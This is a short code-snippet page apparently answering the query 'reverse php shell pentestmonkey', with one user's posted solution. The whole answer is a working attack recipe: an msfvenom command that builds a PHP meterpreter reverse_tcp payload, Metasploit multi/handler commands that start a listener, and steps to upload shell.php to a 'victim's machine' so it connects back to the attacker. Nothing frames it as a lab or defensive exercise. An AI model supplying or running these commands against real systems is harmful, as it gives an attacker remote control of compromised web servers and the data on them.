reverse php shell pentestmonkey

Solutions on MaxInterview for reverse php shell pentestmonkey by the best coders in the world

showing results for - "reverse php shell pentestmonkey"
Emilie
07 Nov 2018
1##This will create the payload file "shell.php" with your ip and port.
2msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP> LPORT=<$LOCAL_PORT> -f raw -o shell.php
3##You can always "nano" the file to change your ipaddr and port incase you messed up the first step.
4#Run 'msfconsole' to start the listener then run the following command.
5use exploit/multi/handler 
6set PAYLOAD php/meterpreter/reverse_tcp
7#set your ipaddr
8set LHOST <$LOCAL_IP>
9#set your listening port
10set LPORT <$LOCAL_PORT>
11#"show options" to check ur steps then run the command "exploit"
12exploit #this will start the listener
13#Upload "shell.php" to your victim's machine.
14#The victim's machine will need to run the file to connect back to your machine.